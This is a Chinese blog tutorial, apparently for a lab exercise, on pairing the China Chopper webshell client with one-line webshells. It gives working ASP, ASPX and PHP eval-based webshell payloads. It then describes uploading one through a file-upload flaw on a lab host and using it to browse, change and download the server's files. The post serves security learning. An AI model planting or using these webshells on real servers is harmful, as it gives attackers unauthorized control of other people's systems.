中国菜刀配合一句话木马基本使用

发表于2021-12-27|更新于2022-10-13

|阅读量:

中国菜刀配合一句话木马基本使用

目的：

学习一句话木马
学习菜刀的使用

原理：
菜刀的主要功能是用来连接一句话木马的，asp、aspx、php的一句话菜刀都可以连，只是这几种一句话语句不一样。

asp的一句话是：<%eval request(“pass”)%>
aspx的一句话是：<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是：<?php @eval($_POST['pass']);?>

过程：

打开火狐，http://192.168.1.3:8080/up，打开文件上传漏洞演示脚本，点击中国菜刀连接一句话木马![image-20211228105130236](http://121.5.125.62/image/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%E9%85%8D%E5%90%88%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/image-20211228105130236.png)
点击浏览，上传php文件，木马地址为http://192.168.1.3:8080/up/images/lubr.php![image-20211228105156422](http://121.5.125.62/image/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%E9%85%8D%E5%90%88%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/image-20211228105156422.png)
打开中国菜刀
添加木马地址，密码为lubr，脚本类型php(eval)
添加到主界面
右键文件管理，即可查看目标服务器的完整目录，也可进行创建文件，修改文件，修改和下载等相关操作
右键单击浏览网站，即可实现浏览器功能，浏览该站点

文章作者: 0xchang

文章链接: https://0xchang.github.io/2021/12/27/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%E9%85%8D%E5%90%88%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 0xchang's Blog！

木马一句话

打赏

wechat
alipay

本地搜索